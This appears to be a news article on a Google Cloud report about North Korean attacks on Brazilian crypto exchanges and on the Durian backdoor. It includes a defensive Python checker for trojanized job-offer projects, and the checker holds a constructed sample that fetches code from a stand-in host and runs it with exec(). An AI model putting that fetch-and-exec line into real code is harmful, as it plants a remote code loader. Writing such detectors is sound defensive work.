Crypto Exchanges Targeted with North Korea's New Cyber Weapon Durian
As the digital world becomes increasingly complex, cybersecurity threats are also rapidly diversifying and evolving. Google Cloud's latest threat intelligence report reveals a situation that once again confirms our concerns. According to the report, North Korean government-backed cyber attackers are organizing sophisticated attacks targeting Brazil's cryptocurrency exchanges and fintech companies.
The Google report, dated June 13, draws attention to coordinated attack attempts against individuals and organizations operating in the cryptocurrency and fintech sector in Brazil. The report states that ransomware, phishing and fraud methods are used in these attacks.
The report emphasizes that Chinese government-backed cybercriminals also target Brazil, but these attacks generally focus on government organizations and the energy sector. This suggests that North Korean attackers are trying to penetrate Brazil’s rapidly developing digital economy.
So, what methods do North Korean attackers use? Pukchong (also known as UNC4899), North Korea’s leading cybercrime group, is targeting Brazilian citizens and organizations through the labor market, according to the report. Attackers present job seekers with fake job postings and trick them into downloading disguised malware.
In one example mentioned in the report, a Python application used to track cryptocurrency prices was turned into a Trojan horse. This app connects to an attacker-controlled server and downloads additional malware when certain conditions are met. In this way, attackers can gain full access to the targeted system.
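As an added example (not taken from the Google report or from this article): a small static check that can be run over a Python project received with a job offer before executing it. It flags files that both fetch remote content and run dynamic code, the behaviour described above for the trojanized price tracker. The call lists, the sample sources and the `example.invalid` URLs are assumptions constructed for illustration.

```python
import ast

# Call names to flag. Both sets are assumptions for this example, not a full list.
FETCH = {"urllib.request.urlopen", "urllib.request.urlretrieve",
         "requests.get", "requests.post", "socket.create_connection"}
RUN = {"exec", "eval", "os.system", "subprocess.run", "subprocess.Popen",
       "subprocess.call", "marshal.loads"}

def _dotted(node):  # 'a.b.c' for a Name/Attribute chain, else None
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    return ".".join(reversed(parts + [node.id])) if isinstance(node, ast.Name) else None

def scan(source):
    """List (kind, qualified_name, line) for every fetch or run call in source."""
    tree = ast.parse(source)
    alias = {}  # local name -> real dotted name, so 'import x as y' cannot hide a call
    for n in ast.walk(tree):
        if isinstance(n, ast.Import):
            for a in n.names:
                root = a.name.split(".")[0]  # 'import a.b' binds only 'a'
                alias[a.asname or root] = a.name if a.asname else root
        elif isinstance(n, ast.ImportFrom) and n.module:
            for a in n.names:
                alias[a.asname or a.name] = f"{n.module}.{a.name}"
    hits = []
    for n in ast.walk(tree):
        name = _dotted(n.func) if isinstance(n, ast.Call) else None
        if name:
            head, _, rest = name.partition(".")
            full = alias.get(head, head) + ("." + rest if rest else "")
            kind = "fetch" if full in FETCH else "run" if full in RUN else None
            if kind:
                hits.append((kind, full, n.lineno))
    return sorted(hits, key=lambda h: h[2])

def fetches_and_runs(source):
    """True when one file both pulls remote content and executes dynamic code."""
    return {kind for kind, _, _ in scan(source)} == {"fetch", "run"}

# Constructed samples: a plain price tracker and one with a conditional second stage.
CLEAN = "import requests\nprint(requests.get('https://api.example.invalid/btc').json())\n"
TROJAN = ("import urllib.request as ur\n"
          "price = ur.urlopen('https://api.example.invalid/btc').read()\n"
          "if price: exec(ur.urlopen('https://cdn.example.invalid/u').read())\n")
if __name__ == "__main__":
    print(fetches_and_runs(CLEAN), fetches_and_runs(TROJAN), scan(TROJAN))
```

A hit is a reason to read the flagged lines, not a verdict; calls hidden behind `getattr` or `__import__` are outside what this check resolves.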
The report also states that other North Korean hacker groups, such as GoPix and URSA, targeted cryptocurrency exchanges in Brazil with similar methods. This shows that the Brazilian cryptocurrency market has become an attractive target for North Korean cybercriminals.
The techniques used by attackers are not limited to Brazil. Recently, cryptocurrency wallet Trust Wallet advised Apple users to disable the iMessage application. This recommendation stems from concerns about a zero-day vulnerability. A zero-day vulnerability is a flaw in software that the vendor has not yet discovered, so no fix is available. By exploiting this vulnerability, attackers can take control of users’ phones.
The activities of North Korean attackers are not limited to Brazil. Cybersecurity firm Kaspersky recently detected that a North Korean hacker group called Kimsuky was using a new malware called “Durian” to attack South Korean cryptocurrency exchanges. Durian has advanced backdoor functions that give attackers full access to the targeted system.
Kaspersky also states that another North Korean hacker group called Andariel uses a tool called LazyLoad, which is also used in similar attacks. This suggests that there may be cooperation or at least information sharing between North Korean hacker groups.
In conclusion, the Google Cloud report reveals that North Korean cybercriminals pose a serious threat to Brazil’s emerging cryptocurrency and fintech sector. To counter these threats, governments, cryptocurrency exchanges, fintech companies, and individuals need to tighten cybersecurity measures. It is also important that users do not click on suspicious links, use strong passwords, and update software regularly.
These North Korean cyber attacks, and the measures Brazil takes against them, shed light on security vulnerabilities in the global cryptocurrency market. This situation once again emphasizes the importance of international cooperation for the future of cryptocurrencies and the protection of digital assets.